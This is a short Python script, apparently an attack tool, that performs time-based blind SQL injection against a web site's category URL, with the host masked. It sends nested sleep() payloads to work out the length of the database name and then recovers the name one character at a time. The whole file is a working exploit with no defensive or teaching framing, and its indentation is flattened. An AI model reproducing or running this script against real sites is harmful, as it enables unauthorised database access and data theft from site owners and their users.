import requests
import time
payloads = 'abcdefghijklmnopqrstuvwxyz1234567890.@_*%'
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'
}
def length():
for i in range(1,99):
s1_1="length(database())"
s1_2="=%d"%i
s1=s1_1+s1_2
url = "http://xxxxxx/category-60-(select(0)from(select(if(" + s1 + ",sleep(4),0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B''%2B(select(0)from(select(sleep(0)))v)%2B'*/-0.html"
time_start = time.time()
rs = requests.get(url=url,headers=headers)
if time.time() - time_start >= 4:
print(i)
break
def name():
databases=""
for i in range(1,6):
for payload in payloads:
s1_1="substr(database(),%d,1)"%i
s1_2 = "='%s'" % payload
s1=s1_1+s1_2
url = "http://xxxxx/category-60-(select(0)from(select(if(" + s1 + ",sleep(4),0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B''%2B(select(0)from(select(sleep(0)))v)%2B'*/-0.html"
time_start=time.time()
rs=requests.get(url=url,headers=headers)
if time.time()-time_start >= 4:
databases+=payload
print(databases)
if __name__ == '__main__':
length()
name()
